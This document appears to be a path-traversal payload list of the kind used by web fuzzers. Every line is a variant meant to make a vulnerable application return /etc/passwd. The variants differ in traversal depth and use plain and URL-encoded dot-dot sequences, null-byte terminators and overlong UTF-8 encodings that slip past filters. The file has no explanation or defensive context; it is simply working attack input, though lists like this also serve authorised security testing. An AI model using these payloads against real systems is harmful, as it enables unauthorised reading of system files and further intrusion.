/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
./.././.././.././.././.././.././.././.././.././etc/passwd
..../..../..../..../..../..../..../..../..../..../etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
\etc\passwd
.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/./..././..././..././..././..././..././..././..././..././...//etc//passwd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/etc/passwd
%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/etc/passwd
/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/etc/passwd
%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AFetc%C0AFpasswd
%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AF%C0AE%c0AE%C0AFetc%C0AFpasswd
%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AFetc%E080AFpasswd
%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AF%F080AE%F080AE%E080AFetc%E080AFpasswd
